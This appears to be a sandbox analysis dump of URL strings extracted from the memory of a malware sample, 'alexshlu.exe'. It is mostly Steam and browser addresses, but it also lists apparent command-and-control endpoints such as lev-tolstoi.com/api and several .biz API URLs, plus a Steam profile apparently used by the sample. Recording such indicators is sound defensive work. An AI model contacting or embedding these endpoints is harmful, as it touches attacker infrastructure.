                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://impend-differ.biz:443/apiG
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1690595429.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754749506.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607970298.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.000000000356B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665843537.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: alexshlu.exe, 00000003.00000003.1607970298.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Def4
                Source: alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/HCrpisg8orLIezaCPJdZDugxC
                Source: alexshlu.exe, 00000003.00000003.1774952818.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775631412.0000000000CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/I
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/M
                Source: alexshlu.exe, 00000003.00000003.1665843537.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607989247.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/OB
                Source: alexshlu.exe, 00000003.00000003.1566499770.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/V
                Source: alexshlu.exe, 00000003.00000002.1775631412.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1667690344.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1666515095.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1667797959.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754886041.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1666745070.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1667392987.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1668322405.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1666818282.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apir
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/lB
                Source: alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/p
                Source: alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pD
                Source: alexshlu.exe, 00000003.00000003.1690595429.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: alexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pid
                Source: alexshlu.exe, 00000003.00000003.1690595429.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s
                Source: alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/t
                Source: alexshlu.exe, 00000003.00000003.1774889064.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775564749.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754886041.0000000000C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: alexshlu.exe, 00000003.00000003.1754886041.0000000000C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apil
                Source: alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apirofiles/76561199724331900
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://print-vexer.biz:443/api~
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/G
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/c
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900l
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampower
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com
                Source: alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
